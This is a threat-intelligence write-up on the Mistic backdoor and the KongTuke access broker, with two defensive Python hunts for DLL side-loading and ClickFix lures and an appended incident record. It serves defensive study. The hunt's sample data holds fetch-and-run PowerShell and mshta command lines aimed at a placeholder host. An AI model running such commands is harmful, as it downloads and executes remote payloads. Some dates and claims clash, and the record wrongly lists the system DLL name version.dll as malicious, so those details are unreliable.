New Mistic Backdoor Linked to KongTuke Initial Access Broker in Targeted Attacks
A newly identified backdoor, dubbed Mistic, has been deployed in financially motivated cyberattacks targeting organizations in the insurance, education, IT, and professional services sectors. The malware is attributed to KongTuke (also known as Woodgnat), an initial access broker (IAB) active since at least 2024, which specializes in breaching corporate networks and selling access to ransomware groups, including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta.
Researchers at Symantec first observed Mistic in intrusions beginning in April 2024, including at least one attack in which Mistic was deployed shortly after ModeloRAT, another backdoor linked to KongTuke, had been delivered via social engineering over Microsoft Teams. Designed for stealth and long-term persistence, Mistic enables attackers to maintain covert access to compromised networks.
Attack Chain & Capabilities
The infection process begins with the execution of a legitimate MpExtMs.exe binary, which is used to side-load a malicious version.dll placed alongside it: because the executable imports version.dll by name, the copy in its own directory is loaded instead of the genuine Windows system DLL. This version.dll acts as a loader for Mistic (disguised as EndpointDlp.dll), a filename chosen to mimic Microsoft endpoint security components and aid evasion. A secondary .NET DLL is also deployed; it displays a fake login screen to harvest credentials.
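The side-loading step above is the one a defender can hunt for directly in image-load telemetry: a host binary resolving a Windows system DLL name from its own directory, or loading an unsigned DLL that sits next to it. The following is an added example, not code from the Symantec or Zscaler reports. It runs over constructed Sysmon Event ID 7 (ImageLoad) style records; the field names follow Sysmon, the sample rows and paths are made up for illustration and are not published indicators, and the list of side-load target names beyond version.dll is an assumption from general side-loading experience. The signature check trusts Sysmon's Signed field rather than verifying Authenticode itself.

```python
"""Hunt for DLL side-loading: a host binary loading a DLL whose name matches
a Windows system DLL (version.dll) from outside System32, or loading an
unsigned DLL from its own directory (the Mistic payload posing as
EndpointDlp.dll). Added example over constructed Sysmon-style records."""
import ntpath

# Directories from which Windows legitimately resolves system DLLs.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# DLL names that are popular side-loading targets because many signed
# binaries import them by name. version.dll is the one used in this case;
# the rest are assumptions, not names from the report.
SIDELOAD_NAMES = {"version.dll", "dbghelp.dll", "cryptbase.dll", "wtsapi32.dll"}


def _norm(path):
    """Normalise a Windows path for comparison (works on non-Windows too)."""
    return ntpath.normpath(path).lower()


def classify_load(event):
    """Return a finding string for a suspicious ImageLoad record, else None."""
    image = _norm(event["Image"])
    loaded = _norm(event["ImageLoaded"])
    dll_dir = ntpath.dirname(loaded)
    dll_name = ntpath.basename(loaded)
    signed = event.get("Signed", "false").lower() == "true"

    if dll_name in SIDELOAD_NAMES and dll_dir not in SYSTEM_DIRS:
        # A system DLL name resolved outside System32/SysWOW64: classic side-load.
        tag = "" if signed else " (unsigned)"
        return f"sideload: {event['Image']} loaded {dll_name} from {dll_dir}{tag}"

    if not signed and dll_dir == ntpath.dirname(image) and dll_dir not in SYSTEM_DIRS:
        # Unsigned DLL loaded from the host binary's own directory.
        return f"unsigned-colocated: {event['Image']} loaded {dll_name}"

    return None


def hunt(events):
    """Run classify_load over a batch of records and keep the findings."""
    return [f for f in (classify_load(e) for e in events) if f]


# Constructed sample telemetry (not real IoCs). Row 1 is a benign load of the
# genuine version.dll; rows 2 and 3 mirror the chain described in the article.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    {"Image": r"C:\ProgramData\Sec\MpExtMs.exe",
     "ImageLoaded": r"C:\ProgramData\Sec\version.dll", "Signed": "false"},
    {"Image": r"C:\ProgramData\Sec\MpExtMs.exe",
     "ImageLoaded": r"C:\ProgramData\Sec\EndpointDlp.dll", "Signed": "false"},
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\helper.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The first rule fires on the name alone, signed or not, because a signed version.dll outside System32 is still out of place; the second rule catches the payload DLL, which carries no suspicious name but is unsigned and co-located with its host. In production the SYSTEM_DIRS set should be derived from %SystemRoot% rather than hard-coded.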
Once active, Mistic establishes communication with its command-and-control (C2) server and supports multiple functions, including:
- File manipulation (upload/download, move, rename, delete, and folder creation)
- Adjustable C2 polling frequency
- In-memory code execution (avoiding disk writes)
- Self-termination and file deletion via a kill switch
Symantec highlights Mistic’s in-memory execution and self-destruct features as key to its low-visibility operations, aligning with KongTuke’s focus on prolonged network access.
Delivery & Additional Tools
While Symantec did not detail the initial infection vector, KongTuke has previously used ClickFix (and its variants FileFix and CrashFix) since early 2025 to deploy ModeloRAT. In a separate report, Zscaler, which tracks Mistic as MTLBackdoor, noted its delivery in a May 2024 multi-stage ClickFix attack chain. A notable feature of MTLBackdoor is its ability to load Beacon Object Files (BOFs), small compiled C object files that are executed in memory and leave no disk footprint, a technique popularised by red-teaming tools such as Cobalt Strike.
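ClickFix and its FileFix variant both end with the victim pasting an attacker-supplied command into the Run dialog or the File Explorer address bar, so the resulting process is spawned by explorer.exe and usually fetches a remote payload. The following is an added example, not code from either vendor report, that scores constructed Sysmon Event ID 1 style process-creation records for that pattern. The interpreter list, command-line indicators and the threshold are assumptions drawn from how ClickFix lures generally work, not indicators published for KongTuke, and the sample records use an example.invalid hostname.

```python
"""Flag ClickFix-style executions (explorer.exe spawning an interpreter that
downloads or hides something) in process-creation telemetry. Added example
over constructed Sysmon Event ID 1-style records."""
import ntpath
import re

# Interpreters and LOLBins that ClickFix lures typically instruct the victim
# to run (assumed list).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "curl.exe", "msiexec.exe", "wscript.exe", "cscript.exe"}

# Command-line fragments indicating a remote fetch or deliberate obfuscation.
INDICATORS = [
    (re.compile(r"https?://", re.I), "remote-url"),
    (re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|"
                r"downloadstring|downloadfile)\b", re.I), "download-cmdlet"),
    (re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I), "encoded-command"),
    (re.compile(r"\s-w(indowstyle)?\s+hidden\b", re.I), "hidden-window"),
    (re.compile(r"\bmshta\b.*https?://", re.I), "mshta-url"),
]


def score_process(event):
    """Return (score, reasons) for one process-creation record.

    A lone explorer.exe parent is normal (users open PowerShell from the
    Start menu), so it only counts as one reason; the caller sets a threshold."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()
    cmdline = event.get("CommandLine", "")
    reasons = []
    if parent == "explorer.exe" and child in INTERPRETERS:
        reasons.append("explorer-spawned-interpreter")
    for pattern, label in INDICATORS:
        if pattern.search(cmdline):
            reasons.append(label)
    return len(reasons), reasons


def clickfix_candidates(events, threshold=2):
    """Return ((score, reasons), event) pairs at or above threshold, highest first."""
    scored = [(score_process(e), e) for e in events]
    hits = [(s, e) for s, e in scored if s[0] >= threshold]
    hits.sort(key=lambda item: -item[0][0])
    return hits


# Constructed sample telemetry (not real IoCs). Rows 1 and 2 mimic a ClickFix
# and an mshta-based lure; rows 3 to 5 are benign-looking controls.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iwr https://example.invalid/verify.txt | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/captcha.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe https://example.invalid/file.zip -o file.zip"},
]

if __name__ == "__main__":
    for (score, reasons), event in clickfix_candidates(SAMPLE_EVENTS):
        print(score, reasons, event["CommandLine"])
```

The threshold of two means an interactive PowerShell launched from the desktop (row 3) and a curl download from an existing console (row 5) each score one and are not raised, while the two lure-shaped rows score three and four. On Windows the same evidence also survives in the HKCU Explorer RunMRU key, which a fuller hunt would correlate with these process events.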
KongTuke’s arsenal extends beyond Mistic, incorporating legitimate tools (WinPython, Node.js) and malware loaders (MintsLoader, D3F@ck Loader) to deploy additional payloads, including the GateKeeper .NET payload and the NexShield browser extension.
Broader Implications
The emergence of Mistic underscores a growing trend of custom backdoors in ransomware operations, developed by IABs with direct ties to cybercriminal ecosystems. Both Symantec and Zscaler have released indicators of compromise (IoCs) for detection, emphasizing the malware’s stealth and modular expansion capabilities.
"id": "INTBLA1782304111",
"linkid": "interlock-network, blackbird-ai",
"type": "Ransomware",
"date": "5/2026",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'industry': ['Insurance',
'Education',
'Information Technology',
'Professional Services'],
'type': ['Insurance',
'Education',
'IT',
'Professional Services']}],
'attack_vector': 'Social engineering (Microsoft Teams), Side-loading via '
'legitimate binary (MpExtMs.exe)',
'data_breach': {'sensitivity_of_data': 'High (corporate network access)',
'type_of_data_compromised': ['Credentials', 'Network access']},
'date_detected': '2024-04',
'description': 'A newly identified backdoor, dubbed Mistic, has been deployed '
'in financially motivated cyberattacks targeting organizations '
'in the insurance, education, IT, and professional services '
'sectors. The malware is attributed to KongTuke (also known as '
'Woodgnat), an initial access broker (IAB) active since at '
'least 2024, which specializes in breaching corporate networks '
'and selling access to ransomware groups, including Qilin, '
'Interlock, Rhysida, Akira, 8Base, and Black Basta. Mistic '
'enables attackers to maintain covert access to compromised '
'networks with stealth and long-term persistence.',
'impact': {'data_compromised': True,
'identity_theft_risk': True,
'operational_impact': 'Covert access for ransomware deployment',
'systems_affected': ['Corporate networks']},
'initial_access_broker': {'backdoors_established': ['Mistic', 'ModeloRAT'],
'data_sold_on_dark_web': True,
'entry_point': ['Social engineering (Microsoft '
'Teams)',
'Side-loading via MpExtMs.exe']},
'investigation_status': 'Ongoing',
'lessons_learned': 'The emergence of Mistic highlights the growing trend of '
'custom backdoors developed by IABs with ties to '
'ransomware groups, emphasizing the need for enhanced '
'detection of stealthy, in-memory malware and modular '
'attack tools.',
'motivation': 'Financial gain',
'post_incident_analysis': {'corrective_actions': ['Block known malicious DLLs '
'(e.g., version.dll, '
'EndpointDlp.dll)',
'Restrict execution of '
'unsigned or suspicious '
'DLLs',
'Enhance monitoring for '
'in-memory code execution',
'Implement application '
'whitelisting'],
'root_causes': ['Use of legitimate binaries for '
'side-loading (MpExtMs.exe)',
'Credential harvesting via fake '
'login screens',
'In-memory execution to evade '
'detection']},
'ransomware': {'ransomware_strain': ['Qilin',
'Interlock',
'Rhysida',
'Akira',
'8Base',
'Black Basta']},
'recommendations': ['Monitor for IoCs related to Mistic/MTLBackdoor and '
'KongTuke activity',
'Enhance detection for in-memory execution and '
'side-loading techniques',
'Implement multi-factor authentication (MFA) to mitigate '
'credential harvesting',
'Review and restrict Microsoft Teams external '
'communications',
'Deploy behavioral analysis tools to detect anomalous '
'activity'],
'references': [{'source': 'Symantec'}, {'source': 'Zscaler'}],
'response': {'third_party_assistance': ['Symantec', 'Zscaler']},
'threat_actor': 'KongTuke (Woodgnat)',
'title': 'New Mistic Backdoor Linked to KongTuke Initial Access Broker in '
'Targeted Attacks',
'type': ['Backdoor', 'Initial Access Broker (IAB) Activity']}